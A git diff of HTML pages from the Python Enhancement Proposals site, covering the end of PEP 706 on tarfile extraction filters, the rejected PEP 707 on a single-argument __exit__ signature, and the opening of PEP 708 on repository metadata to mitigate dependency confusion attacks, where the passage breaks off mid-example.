  • With errorlevel=0, documentation says that “all errors are ignored +when using extract() and +extractall()”. +The code only ignores non-fatal and fatal errors (see below), +so, for example, you still get TypeError if you pass None as the +destination path.
  • +
  • With errorlevel=1 (the default), all non-fatal errors are ignored. +(They may be logged to sys.stderr by setting the debug +argument/attribute.) +Which errors are non-fatal is not defined in documentation, but code treats +ExtractionError as such. Specifically, it’s these issues:
      +
    • “unable to resolve link inside archive” (raised on systems that do not +support symlinks)
    • +
    • “fifo/special devices not supported by system” (not used for failures if +the system supports these, e.g. for a PermissionError)
    • +
    • “could not change owner/mode/modification time”
    • +
    +

    Note that, for example, file name too long or out of disk space don’t +qualify. +The non-fatal errors are not very likely to appear on a Unix-like system.

    +
  • +
  • With errorlevel=2, all errors are raised, including fatal ones. +Which errors are fatal is, again, not defined; in practice it’s +OSError.
  • +
+

A filter refusing to extract a member does not fit neatly into the +fatal/non-fatal categories.

+
    +
  • This PEP does not change existing behavior. (Ideas for improvements are +welcome in Discourse topic 25970.)
  • +
  • When a filter refuses to extract a member, the error should not pass +silently by default.
  • +
+

To satisfy this, FilterError will be considered a fatal error, that is, +it’ll be ignored only with errorlevel=0.

+

Users that want to ignore FilterError but not other fatal errors should +create a custom filter function, and call another filter in a try block.

+
+
+

Hints for further verification

+

Even with the proposed changes, tarfile will not be +suited for extracting untrusted files without prior inspection. +Among other issues, the proposed policies don’t prevent denial-of-service +attacks. +Users should do additional checks.

+

New docs will tell users to consider:

+
    +
  • extracting to a new empty directory,
  • +
  • using external (e.g. OS-level) limits on disk, memory and CPU usage,
  • +
  • checking filenames against an allow-list of characters (to filter out control +characters, confusables, etc.),
  • +
  • checking that filenames have expected extensions (discouraging files that +execute when you “click on them”, or extension-less files like Windows +special device names),
  • +
  • limiting the number of extracted files, total size of extracted data, +and size of individual files,
  • +
  • checking for files that would be shadowed on case-insensitive filesystems.
  • +
+

Also, the docs will note that:

+
    +
  • tar files commonly contain multiple versions of the same file: later ones are +expected to overwrite earlier ones on extraction,
  • +
  • tarfile does not protect against issues with “live” data, e.g. an attacker +tinkering with the destination directory while extracting (or adding) is +going on (see the GNU tar manual +for more info).
  • +
+

This list is not comprehensive, but the documentation is a good place to +collect such general tips. +It can be moved into a separate document if grows too long or if it needs to +be consolidated with zipfile or shutil +(which is out of scope for this proposal).

+
+
+

TarInfo identity, and offset

+

With filters that use replace(), the TarInfo objects handled +by the extraction machinery will not necessarily be the same objects +as those present in members. +This may affect TarInfo subclasses that override methods like +makelink and rely on object identity.

+

Such code can switch to comparing offset, the position of the member +header inside the file.

+

Note that both the overridable methods and offset are only +documented in source comments.

+
+
+

tarfile CLI

+

The CLI (python -m tarfile) will gain a --filter option +that will take the name of one of the provided default filters. +It won’t be possible to specify a custom filter function.

+

If --filter is not given, the CLI will use the default filter +('fully_trusted' with a deprecation warning now, and 'data' from +Python 3.14 on).

+

There will be no short option. (-f would be confusingly similar to +the filename option of GNU tar.)

+
+
+

Other archive libraries

+

If and when other archive libraries, such as zipfile, +grow similar functionality, their extraction functions should use a filter +argument that takes, at least, the strings 'fully_trusted' (which should +disable any security precautions) and 'data' (which should avoid features +that might surprise users).

+

Standardizing a function-based filter API is out of scope of this PEP.

+
+
+

Shutil

+

shutil.unpack_archive() will gain a filter argument. +If it’s given, it will be passed to the underlying extraction function. +Passing it for a zip archive will fail for now (until zipfile +gains a filter argument, if it ever does).

+

If filter is not specified (or left as None), it won’t be passed +on, so extracting a tarball will use the default filter +('fully_trusted' with a deprecation warning now, and 'data' from +Python 3.14 on).

+
+
+

Complex filters

+

Note that some user-defined filters need, for example, +to count extracted members of do post-processing. +This requires a more complex API than a filter callable. +However, that complex API need not be exposed to tarfile. +For example, with a hypothetical StatefulFilter users would write:

+
with StatefulFilter() as filter_func:
+    my_tar.extract(path, filter=filter_func)
+
+
+

A simple StatefulFilter example will be added to the docs.

+
+

Note

+

The need for stateful filters is a reason against allowing +registration of custom filter names in addition to 'fully_trusted', +'tar' and 'data'. +With such a mechanism, API for (at least) set-up and tear-down would need +to be set in stone.

+
+
+
+
+

Backwards Compatibility

+

The default behavior of TarFile.extract +and TarFile.extractall +will change, after raising DeprecationWarning for 2 releases +(shortest deprecation period allowed in Python’s +backwards compatibility policy).

+

Additionally, code that relies on tarfile.TarInfo +object identity may break, see TarInfo identity, and offset.

+
+
+

Backporting & Forward Compatibility

+

This feature may be backported to older versions of Python.

+

In CPython, we don’t add warnings to patch releases, so the default +filter should be changed to 'fully_trusted' in backports.

+

Other than that, all of the changes to tarfile should be backported, so +hasattr(tarfile, 'data_filter') becomes a reliable check for all +of the new functionality.

+

Note that CPython’s usual policy is to avoid adding new APIs in security +backports. +This feature does not make sense without a new API +(TarFile.extraction_filter and the filter argument), +so we’ll make an exception. +(See Discourse comment 23149/16 +for details.)

+

Here are examples of code that takes into account that tarfile may or may +not have the proposed feature.

+

When copying these snippets, note that setting extraction_filter +will affect subsequent operations.

+
    +
  • Fully trusted archive:
    my_tarfile.extraction_filter = (lambda member, path: member)
    +my_tarfile.extractall()
    +
    +
    +
  • +
  • Use the 'data' filter if available, but revert to Python 3.11 behavior +('fully_trusted') if this feature is not available:
    my_tarfile.extraction_filter = getattr(tarfile, 'data_filter',
    +                                       (lambda member, path: member))
    +my_tarfile.extractall()
    +
    +
    +

    (This is an unsafe operation, so it should be spelled out explicitly, +ideally with a comment.)

    +
  • +
  • Use the 'data' filter; fail if it is not available:
    my_tarfile.extractall(filter=tarfile.data_filter)
    +
    +
    +

    or:

    +
    my_tarfile.extraction_filter = tarfile.data_filter
    +my_tarfile.extractall()
    +
    +
    +
  • +
  • Use the 'data' filter; warn if it is not available:
    if hasattr(tarfile, 'data_filter'):
    +    my_tarfile.extractall(filter='data')
    +else:
    +    # remove this when no longer needed
    +    warn_the_user('Extracting may be unsafe; consider updating Python')
    +    my_tarfile.extractall()
    +
    +
    +
  • +
+
+
+

Security Implications

+

This proposal improves security, at the expense of backwards compatibility. +In particular, it will help users avoid CVE-2007-4559.

+
+
+

How to Teach This

+

The API, usage notes and tips for further verification will be added to +the documentation. +These should be usable for users who are familiar with archives in general, but +not with the specifics of UNIX filesystems nor the related security issues.

+
+
+

Reference Implementation

+

See pull request #102953 on GitHub.

+
+
+

Rejected Ideas

+
+

SafeTarFile

+

An initial idea from Lars Gustäbel was to provide a separate class that +implements security checks (see gh-65308). +There are two major issues with this approach:

+
    +
  • The name is misleading. General archive operations can never be made “safe” +from all kinds of unwanted behavior, without impacting legitimate use cases.
  • +
  • It does not solve the problem of unsafe defaults.
  • +
+

However, many of the ideas behind SafeTarFile were reused in this PEP.

+
+
+

Add absolute_path option to tarfile

+

Issue gh-73974 asks for adding an absolute_path option to extraction +methods. This would be a minimal change to formally resolve CVE-2007-4559. +It doesn’t go far enough to protect the unaware, nor to empower the diligent +and curious.

+
+
+

Other names for the 'tar' filter

+

The 'tar' filter exposes features specific to UNIX-like filesystems, +so it could be named 'unix'. +Or 'unix-like', 'nix', '*nix', 'posix'?

+

Feature-wise, tar format and UNIX-like filesystem are essentially +equivalent, so tar is a good name.

+
+
+
+

Possible Further Work

+
+

Adding filters to zipfile and shutil.unpack_archive

+

For consistency, zipfile and +shutil.unpack_archive() could gain support +for a filter argument. +However, this would require research that this PEP’s author can’t promise +for Python 3.12.

+

Filters for zipfile would probably not help security. +Zip is used primarily for cross-platform data bundles, and correspondingly, +ZipFile.extract’s defaults +are already similar to what a 'data' filter would do. +A 'fully_trusted' filter, which would newly allow absolute paths and +.. path components, might not be useful for much except +a unified unpack_archive API.

+

Filters should be useful for use cases other than security, but those +would usually need custom filter functions, and those would need API that works +with both TarInfo and +ZipInfo. +That is definitely out of scope of this PEP.

+

If only this PEP is implemented and nothing changes for zipfile, +the effect for callers of unpack_archive is that the default +for tar files is changing from 'fully_trusted' to +the more appropriate 'data'. +In the interim period, Python 3.12-3.13 will emit DeprecationWarning. +That’s annoying, but there are several ways to handle it: e.g. add a +filter argument conditionally, set TarFile.extraction_filter +globally, or ignore/suppress the warning until Python 3.14.

+

Also, since many calls to unpack_archive are likely to be unsafe, +there’s hope that the DeprecationWarning will often turn out to be +a helpful hint to review affected code.

+
+
+
+

Thanks

+

This proposal is based on prior work and discussions by many people, +in particular Lars Gustäbel, Gregory P. Smith, Larry Hastings, Joachim Wagner, +Jan Matejek, Jakub Wilk, Daniel Garcia, Lumír Balhar, Miro Hrončok, +and many others.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0706.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0707/index.html b/pep-0707/index.html new file mode 100644 index 00000000000..52e4d8d1d8c --- /dev/null +++ b/pep-0707/index.html @@ -0,0 +1,511 @@ + + + + + + + + PEP 707 – A simplified signature for __exit__ and __aexit__ | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 707 – A simplified signature for __exit__ and __aexit__

+
+
Author:
+
Irit Katriel <irit at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
18-Feb-2023
+
Python-Version:
+
3.12
+
Post-History:
+
02-Mar-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

Per the SC:

+
+
We discussed the PEP and have decided to reject it. Our thinking was the +magic and risk of potential breakage didn’t warrant the benefits. We are +totally supportive, though, of exploring a potential context manager v2 +API or __leave__.
+
+
+

Abstract

+

This PEP proposes to make the interpreter accept context managers whose +__exit__() / __aexit__() method +takes only a single exception instance, +while continuing to also support the current (typ, exc, tb) signature +for backwards compatibility.

+

This proposal is part of an ongoing effort to remove the redundancy of +the 3-item exception representation from the language, a relic of earlier +Python versions which now confuses language users while adding complexity +and overhead to the interpreter.

+

The proposed implementation uses introspection, which is tailored to the +requirements of this use case. The solution ensures the safety of the new +feature by supporting it only in non-ambiguous cases. In particular, any +signature that could accept three arguments is assumed to expect them.

+

Because reliable introspection of callables is not currently possible in +Python, the solution proposed here is limited in that only the common types +of single-arg callables will be identified as such, while some of the more +esoteric ones will continue to be called with three arguments. This +imperfect solution was chosen among several imperfect alternatives in the +spirit of practicality. It is my hope that the discussion about this PEP +will explore the other options and lead us to the best way forward, which +may well be to remain with our imperfect status quo.

+
+
+

Motivation

+

In the past, an exception was represented in many parts of Python by a +tuple of three elements: the type of the exception, its value, and its +traceback. While there were good reasons for this design at the time, +they no longer hold because the type and traceback can now be reliably +deduced from the exception instance. Over the last few years we saw +several efforts to simplify the representation of exceptions.

+

Since 3.10 in CPython PR #70577, +the traceback module’s functions accept either a 3-tuple +as described above, or just an exception instance as a single argument.

+

Internally, the interpreter no longer represents exceptions as a triplet. +This was removed for the handled exception in 3.11 and +for the raised exception in 3.12. As a consequence, +several APIs that expose the triplet can now be replaced by +simpler alternatives:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Legacy APIAlternative
Get handled exception (Python)sys.exc_info()sys.exception()
Get handled exception (C)PyErr_GetExcInfo()PyErr_GetHandledException()
Set handled exception (C)PyErr_SetExcInfo()PyErr_SetHandledException()
Get raised exception (C)PyErr_Fetch()PyErr_GetRaisedException()
Set raised exception (C)PyErr_Restore()PyErr_SetRaisedException()
Construct an exception instance from the 3-tuple (C)PyErr_NormalizeException()N/A
+

The current proposal is a step in this process, and considers the way +forward for one more case in which the 3-tuple representation has +leaked to the language. The motivation for all this work is twofold.

+
+

Simplify the implementation of the language

+

The simplification gained by reducing the interpreter’s internal +representation of the handled exception to a single object was significant. +Previously, the interpreter needed to push onto/pop +from the stack three items whenever it did anything with exceptions. +This increased stack depth (adding pressure on caches and registers) and +complicated some of the bytecodes. Reducing this to one item +removed about 100 lines of code +from ceval.c (the interpreter’s eval loop implementation), and it was later +followed by the removal of the POP_EXCEPT_AND_RERAISE opcode which has +become simple enough to be replaced by generic stack manipulation instructions. Micro-benchmarks showed +a speedup of about 10% for catching and raising an exception, as well as +for creating generators. +To summarize, removing this redundancy in Python’s internals simplified the +interpreter and made it faster.

+

The performance of invoking __exit__/__aexit__ when leaving +a context manager can be also improved by replacing a multi-arg function +call with a single-arg one. Micro-benchmarks showed that entering and exiting +a context manager with single-arg __exit__ is about 13% faster.

+
+
+

Simplify the language itself

+

One of the reasons for the popularity of Python is its simplicity. The +sys.exc_info() triplet is cryptic for new learners, +and the redundancy in it is confusing for those who do understand it.

+

It will take multiple releases to get to a point where we can think of +deprecating sys.exc_info(). However, we can relatively quickly reach a +stage where new learners do not need to know about it, or about the 3-tuple +representation, at least until they are maintaining legacy code.

+
+
+
+

Rationale

+

The only reason to object today to the removal of the last remaining +appearances of the 3-tuple from the language is the concerns about +disruption that such changes can bring. The goal of this PEP is to propose +a safe, gradual and minimally disruptive way to make this change in the +case of __exit__, and with this to initiate a discussion of our options +for evolving its method signature.

+

In the case of the traceback module’s API, evolving the +functions to have a hybrid signature is relatively straightforward and +safe. The functions take one positional and two optional arguments, and +interpret them according to their types. This is safe when sentinels +are used for default values. The signatures of callbacks, which are +defined by the user’s program, are harder to evolve.

+

The safest option is to make the user explicitly indicate which signature +the callback is expecting, by marking it with an additional attribute or +giving it a different name. For example, we could make the interpreter +look for a __leave__ method on the context manager, and call it with +a single arg if it exists (otherwise, it looks for __exit__ and +continues as it does now). The introspection-based alternative proposed +here intends to make it more convenient for users to write new code, +because they can just use the single-arg version and remain unaware of +the legacy API. However, if the limitations of introspection are found +to be too severe, we should consider an explicit option. Having both +__exit__ and __leave__ around for 5-10 years with similar +functionality is not ideal, but it is an option.

+

Let us now examine the limitations of the current proposal. It identifies +2-arg python functions and METH_O C functions as having a single-arg +signature, and assumes that anything else is expecting 3 args. Obviously +it is possible to create false negatives for this heuristic (single-arg +callables that it will not identify). Context managers written in this +way won’t work, they will continue to fail as they do now when their +__exit__ function will be called with three arguments.

+

I believe that it will not be a problem in practice. First, all working +code will continue to work, so this is a limitation on new code rather +than a problem impacting existing code. Second, exotic callable types are +rarely used for __exit__ and if one is needed, it can always be wrapped +by a plain vanilla method that delegates to the callable. For example, we +can write this:

+
class C:
+   __enter__ = lambda self: self
+   __exit__ = ExoticCallable()
+
+
+

as follows:

+
class CM:
+   __enter__ = lambda self: self
+   _exit = ExoticCallable()
+   __exit__ = lambda self, exc: CM._exit(exc)
+
+
+

While discussing the real-world impact of the problem in this PEP, it is +worth noting that most __exit__ functions don’t do anything with their +arguments. Typically, a context manager is implemented to ensure that some +cleanup actions take place upon exit. It is rarely appropriate for the +__exit__ function to handle exceptions raised within the context, and +they are typically allowed to propagate out of __exit__ to the calling +function. This means that most __exit__ functions do not access their +arguments at all, and we should take this into account when trying to +assess the impact of different solutions on Python’s userbase.

+
+
+

Specification

+

A context manager’s __exit__/__aexit__ method can have a single-arg +signature, in which case it is invoked by the interpreter with the argument +equal to an exception instance or None:

+
>>> class C:
+...     def __enter__(self):
+...         return self
+...     def __exit__(self, exc):
+...         print(f'__exit__ called with: {exc!r}')
+...
+>>> with C():
+...     pass
+...
+__exit__ called with: None
+>>> with C():
+...     1/0
+...
+__exit__ called with: ZeroDivisionError('division by zero')
+Traceback (most recent call last):
+  File "<stdin>", line 2, in <module>
+ZeroDivisionError: division by zero
+
+
+

If __exit__/__aexit__ has any other signature, it is invoked with +the 3-tuple (typ, exc, tb) as happens now:

+
>>> class C:
+...     def __enter__(self):
+...         return self
+...     def __exit__(self, *exc):
+...         print(f'__exit__ called with: {exc!r}')
+...
+>>> with C():
+...     pass
+...
+__exit__ called with: (None, None, None)
+>>> with C():
+...     1/0
+...
+__exit__ called with: (<class 'ZeroDivisionError'>, ZeroDivisionError('division by zero'), <traceback object at 0x1039cb570>)
+Traceback (most recent call last):
+  File "<stdin>", line 2, in <module>
+ZeroDivisionError: division by zero
+
+
+

These __exit__ methods will also be called with a 3-tuple:

+
def __exit__(self, typ, *exc):
+    pass
+
+def __exit__(self, typ, exc, tb):
+    pass
+
+
+

A reference implementation is provided in +CPython PR #101995.

+

When the interpreter reaches the end of the scope of a context manager, +and it is about to call the relevant __exit__ or __aexit__ function, +it instrospects this function to determine whether it is the single-arg +or the legacy 3-arg version. In the draft PR, this introspection is performed +by the is_legacy___exit__ function:

+
static int is_legacy___exit__(PyObject *exit_func) {
+    if (PyMethod_Check(exit_func)) {
+        PyObject *func = PyMethod_GET_FUNCTION(exit_func);
+        if (PyFunction_Check(func)) {
+            PyCodeObject *code = (PyCodeObject*)PyFunction_GetCode(func);
+            if (code->co_argcount == 2 && !(code->co_flags & CO_VARARGS)) {
+                /* Python method that expects self + one more arg */
+                return false;
+            }
+        }
+    }
+    else if (PyCFunction_Check(exit_func)) {
+        if (PyCFunction_GET_FLAGS(exit_func) == METH_O) {
+            /* C function declared as single-arg */
+            return false;
+         }
+    }
+    return true;
+}
+
+
+

It is important to note that this is not a generic introspection function, but +rather one which is specifically designed for our use case. We know that +exit_func is an attribute of the context manager class (taken from the +type of the object that provided __enter__), and it is typically a function. +Furthermore, for this to be useful we need to identify enough single-arg forms, +but not necessarily all of them. What is critical for backwards compatibility is +that we will never misidentify a legacy exit_func as a single-arg one. So, +for example, __exit__(self, *args) and __exit__(self, exc_type, *args) +both have the legacy form, even though they could be invoked with one arg.

+

In summary, an exit_func will be invoke with a single arg if:

+
    +
  • It is a PyMethod with argcount 2 (to count self) and no vararg, or
  • +
  • it is a PyCFunction with the METH_O flag.
  • +
+

Note that any performance cost of the introspection can be mitigated via +specialization, so it won’t be a problem if we need to make it more +sophisticated than this for some reason.

+
+
+

Backwards Compatibility

+

All context managers that previously worked will continue to work in the +same way because the interpreter will call them with three args whenever +they can accept three args. There may be context managers that previously +did not work because their exit_func expected one argument, so the call +to __exit__ would have caused a TypeError exception to be raised, +and now the call would succeed. This could theoretically change the +behaviour of existing code, but it is unlikely to be a problem in practice.

+

The backwards compatibility concerns will show up in some cases when libraries +try to migrate their context managers from the multi-arg to the single-arg +signature. If __exit__ or __aexit__ is called by any code other than +the interpreter’s eval loop, the introspection does not automatically happen. +For example, this will occur where a context manager is subclassed and its +__exit__ method is called directly from the derived __exit__. Such +context managers will need to migrate to the single-arg version with their +users, and may choose to offer a parallel API rather than breaking the +existing one. Alternatively, a superclass can stay with the signature +__exit__(self, *args), and support both one and three args. Since +most context managers do not use the value of the arguments to __exit__, +and simply allow the exception to propagate onward, this is likely to be the +common approach.

+
+
+

Security Implications

+

I am not aware of any.

+
+
+

How to Teach This

+

The language tutorial will present the single-arg version, and the documentation +for context managers will include a section on the legacy signatures of +__exit__ and __aexit__.

+
+
+

Reference Implementation

+

CPython PR #101995 +implements the proposal of this PEP.

+
+
+

Rejected Ideas

+
+

Support __leave__(self, exc)

+

It was considered to support a method by a new name, such as __leave__, +with the new signature. This basically makes the programmer explicitly declare +which signature they are intending to use, and avoid the need for introspection.

+

Different variations of this idea include different amounts of magic that can +help automate the equivalence between __leave__ and __exit__. For example, +Mark Shannon suggested +that the type constructor would add a default implementation for each of __exit__ +and __leave__ whenever one of them is defined on a class. This default +implementation acts as a trampoline that calls the user’s function. This would +make inheritance work seamlessly, as well as the migration from __exit__ to +__leave__ for particular classes. The interpreter would just need to call +__leave__, and that would call __exit__ whenever necessary.

+

While this suggestion has several advantages over the current proposal, it has +two drawbacks. The first is that it adds a new dunder name to the data model, +and we would end up with two dunders that mean the same thing, and only slightly +differ in their signatures. The second is that it would require the migration of +every __exit__ to __leave__, while with introspection it would not be +necessary to change the many __exit__(*arg) methods that do not access their +args. While it is not as simple as a grep for __exit__, it is possible to write +an AST visitor that detects __exit__ methods that can accept multiple arguments, +and which do access them.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0707.rst

+

Last modified: 2023-10-10 15:15:34 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0708/index.html b/pep-0708/index.html new file mode 100644 index 00000000000..ff4589c92fe --- /dev/null +++ b/pep-0708/index.html @@ -0,0 +1,1018 @@ + + + + + + + + PEP 708 – Extending the Repository API to Mitigate Dependency Confusion Attacks | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 708 – Extending the Repository API to Mitigate Dependency Confusion Attacks

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Provisional
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
20-Feb-2023
+
Post-History:
+
01-Feb-2023, +23-Feb-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Provisional Acceptance

+

This PEP has been provisionally accepted, +with the following required conditions before the PEP is made Final:

+
    +
  1. An implementation of the PEP in PyPI (Warehouse) +including any necessary UI elements +to allow project owners to set the tracking data.
  2. +
  3. An implementation of the PEP in at least one repository other than PyPI, +as you can’t really test merging indexes without at least two indexes.
  4. +
  5. An implementation of the PEP in pip, +which supports the intended semantics and can be used to demonstrate +that the expected security benefits are achieved. +This implementation will need to be “off by default” initially, +which means that users will have to opt in to testing it. +Ideally, we should collect explicit positive reports from users +(both project owners and project users) +who have successfully tried out the new feature, +rather than just assuming that “no news is good news”.
  6. +
+
+
+

Abstract

+

Dependency confusion attacks, in which a malicious package is installed instead +of the one the user expected, are an increasingly common supply chain threat. +Most such attacks against Python dependencies, including the +recent PyTorch incident, +occur with multiple package repositories, where a dependency expected to come +from one repository (e.g. a custom index) is installed from another (e.g. PyPI).

+

To help address this problem, this PEP proposes extending the +Simple Repository API +to allow repository operators to indicate that a project found on their +repository “tracks” a project on different repositories, and allows projects to +extend their namespaces across multiple repositories.

+

These features will allow installers to determine when a project being made +available from a particular mix of repositories is expected and should be +allowed, and when it is not and should halt the install with an error to protect +the user.

+
+
+

Motivation

+

There is a long-standing class of attacks that are called “dependency confusion” +attacks, which roughly boil down to an individual user expected to get package +A, but instead they got B. In Python, this almost always happens due to +the configuration of multiple repositories (possibly including the default of +PyPI), where they expected package A to come from repository X, but +someone is able to publish package B to repository Y under the same +name.

+

Dependency Confusion attacks have long been possible, but they’ve recently +gained press with +public examples of cases where these attacks were successfully executed.

+

A specific example of this is the recent case where the PyTorch project had an +internal package named torchtriton which was only ever intended to be +installed from their repositories located at https://download.pytorch.org/, +but that repository was designed to be used in conjunction with PyPI, and +the name of torchtriton was not claimed on PyPI, which allowed the attacker +to use that name and publish a malicious version.

+

There are a number of ways to mitigate against these attacks today, but they all +require that the end user go out of their way to protect themselves, rather than +being protected by default. This means that for the vast bulk of users, they are +likely to remain vulnerable, even if they are ultimately aware of these types of +attacks.

+

Ultimately the underlying cause of these attacks come from the fact that there +is no globally unique namespace that all Python package names come from. +Instead, each repository is its own distinct namespace, and when given an +“abstract” name such as spam to install, an installer has to implicitly turn +that into a “concrete” name such as pypi.org:spam or example.com:spam. +Currently the standard behavior in Python installation tools is to implicitly +flatten these multiple namespaces into one that contains the files from all +namespaces.

+

This assumption that collapsing the namespaces is what was expected means that +when packages with the same name in different repositories +are authored by different parties (such as in the torchtriton case) +dependency confusion attacks become possible.

+

This is made particularly tricky in that there is no “right” answer; there are +valid use cases both for wanting two repositories merged into one namespace +and for wanting two repositories to be treated as distinct namespaces. This +means that an installer needs some mechanism by which to determine when it +should merge the namespaces of multiple repositories and when it should not, +rather than a blanket always merge or never merge rule.

+

This functionality could be pushed directly to the end user, since ultimately +the end user is the person whose expectations of what gets installed from what +repository actually matters. However, by extending the repository specification +to allow a repository to indicate when it is safe, we can enable individual +projects and repositories to “work by default”, even when their +project naturally spans multiple distinct namespaces, while maintaining the +ability for an installer to be secure by default.

+

On its own, this PEP does not solve dependency confusion attacks, but what it +does do is provide enough information so that installers can prevent them +without causing too much collateral damage to otherwise valid and safe use +cases.

+
+
+

Rationale

+

There are two broad use cases for merging names across repositories that this +PEP seeks to enable.

+

The first use case is when one repository is not defining its own names, but +rather is extending names defined in other repositories. This commonly happens +in cases where a project is being mirrored from one repository to another (see +Bandersnatch) or when a repository +is providing supplementary artifacts for a specific platform (see +Piwheels).

+

In this case neither the repositories nor the projects that are being extended +may have any knowledge that they are being extended or by whom, so this cannot +rely on any information that isn’t present in the “extending” repository itself.

+

The second use case is when the project wants to publish to one “main” +repository, but then have additional repositories that provide binaries for +additional platforms, GPUs, CPUs, etc. Currently wheel tags are not sufficiently +able to express these types of binary compatibility, so projects that wish to +rely on them are forced to set up multiple repositories and have their users +manually configure them to get the correct binaries for their platform, GPU, +CPU, etc.

+

This use case is similar to the first, but the important difference that makes +it a distinct use case on its own is who is providing the information and what +their level of trust is.

+

When a user configures a specific repository (or relies on the default) there +is no ambiguity as to what repository they mean. A repository is identified by +an URL, and through the domain system, URLs are globally unique identifiers. +This lack of ambiguity means that an installer can assume that the repository +operator is trustworthy and can trust metadata that they provide without needing +to validate it.

+

On the flip side, given an installer finds a name in multiple repositories it is +ambiguous which of them the installer should trust. This ambiguity means that an +installer cannot assume that the project owner on either repository is +trustworthy and needs to validate that they are indeed the same project and that +one isn’t a dependency confusion attack.

+

Without some way for the installer to validate the metadata between multiple +repositories, projects would be forced into becoming repository operators to +safely support this use case. That wouldn’t be a particularly wrong choice to +make; however, there is a danger that if we don’t provide a way for repositories +to let project owners express this relationship safely, they will be +incentivized to let them use the repository operator’s metadata instead which +would reintroduce the original insecurity.

+
+
+

Specification

+

This specification defines the changes in version 1.2 of the simple repository +API, adding new two new metadata items: Repository “Tracks” and “Alternate +Locations”.

+
+

Repository “Tracks” Metadata

+

To enable one repository to host a project that is intended to “extend” a +project that is hosted at other repositories, this PEP allows the extending +repository to declare that a particular project “tracks” a project at another +repository or repositories by adding the URLs of the project and repositories +that it is extending.

+

This is exposed in JSON as the key meta.tracks and in HTML as a meta element +named pypi:tracks on the project specific URLs, ($root/$project/).

+

There are a few key properties that MUST be preserved when using this +metadata:

+
    +
  • It MUST be under the control of the repository operators themselves, not +any individual publisher using that repository.
      +
    • “Repository Operator” can also include anyone who managed the overall +namespace for a particular repository, which may be the case in situations +like hosted repository services where one entity operates the software but +another owns/manages the entire namespace of that repository.
    • +
    +
  • +
  • All URLs MUST represent the same “project” as the project in the extending +repository.
      +
    • This does not mean that they need to serve the same files. It is valid for +them to include binaries built on different platforms, copies with local +patches being applied, etc. This is purposefully left vague as it’s +ultimately up to the expectations that the users have of the repository and +its operators what exactly constitutes the “same” project.
    • +
    +
  • +
  • It MUST point to the repositories that “own” the namespaces, not another +repository that is also tracking that namespace.
  • +
  • It MUST point to a project with the exact same name (after normalization).
  • +
  • It MUST point to the actual URLs for that project, not the base URL for +the extended repositories.
  • +
+

It is NOT required that every name in a repository tracks the same +repository, or that they all track a repository at all. Mixed use repositories +where some names track a repository and some names do not are explicitly +allowed.

+
+

JSON

+
{
+  "meta": {
+    "api-version": "1.2",
+    "tracks": ["https://pypi.org/simple/holygrail/", "https://test.pypi.org/simple/holygrail/"]
+  },
+  "name": "holygrail",
+  "files": [
+    {
+      "filename": "holygrail-1.0.tar.gz",
+      "url": "https://example.com/files/holygrail-1.0.tar.gz",
+      "hashes": {"sha256": "...", "blake2b": "..."},
+      "requires-python": ">=3.7",
+      "yanked": "Had a vulnerability"
+    },
+    {
+      "filename": "holygrail-1.0-py3-none-any.whl",
+      "url": "https://example.com/files/holygrail-1.0-py3-none-any.whl",
+      "hashes": {"sha256": "...", "blake2b": "..."},
+      "requires-python": ">=3.7",
+      "dist-info-metadata": true
+    }
+  ]
+}
+
+
+
+
+

HTML

+
<!DOCTYPE html>
+<html>
+  <head>
+    <meta name="pypi:repository-version" content="1.2">
+    <meta name="pypi:tracks" content="https://pypi.org/simple/holygrail/">
+    <meta name="pypi:tracks" content="https://test.pypi.org/simple/holygrail/">
+  </head>
+  <body>
+    <a href="https://example.com/files/holygrail-1.0.tar.gz#sha256=...">
+    <a href="https://example.com/files/holygrail-1.0-py3-none-any.whl#sha256=...">
+  </body>
+</html>
+
+
+
+
+
+

“Alternate Locations” Metadata

+

To enable a project to extend its namespace across multiple repositories, this +PEP allows a project owner to declare a list of “alternate locations” for their +project. This is exposed in JSON as the key alternate-locations and in HTML +as a meta element named pypi-alternate-locations, which may be used multiple +times.

+

There are a few key properties that MUST be observed when using this +metadata:

+
    +
  • In order for this metadata to be trusted, there MUST be agreement between +all locations where that project is found as to what the alternate locations +are.
  • +
  • When using alternate locations, clients MUST implicitly assume that the +url the response was fetched from was included in the list. This means that +if you fetch from https://pypi.org/simple/foo/ and it has an +alternate-locations metadata that has the value +["https://example.com/simple/foo/"], then you MUST treat it as if it +had the value +["https://example.com/simple/foo/", "https://pypi.org/simple/foo/"].
  • +
  • Order of the elements within the array does not have any particular meaning.
  • +
+

When an installer encounters a project that is using the alternate locations +metadata it SHOULD consider that all repositories named are extending the +same namespace across multiple repositories.

+
+

Note

+

This alternate locations metadata is project level metadata, not artifact +level metadata, which means it doesn’t get included as part of the core +metadata spec, but rather it is something that each repository will have to +provide a configuration option for (if they choose to support it).

+
+
+

JSON

+
{
+  "meta": {
+    "api-version": "1.2"
+  },
+  "name": "holygrail",
+  "alternate-locations": ["https://pypi.org/simple/holygrail/", "https://test.pypi.org/simple/holygrail/"],
+  "files": [
+    {
+      "filename": "holygrail-1.0.tar.gz",
+      "url": "https://example.com/files/holygrail-1.0.tar.gz",
+      "hashes": {"sha256": "...", "blake2b": "..."},
+      "requires-python": ">=3.7",
+      "yanked": "Had a vulnerability"
+    },
+    {
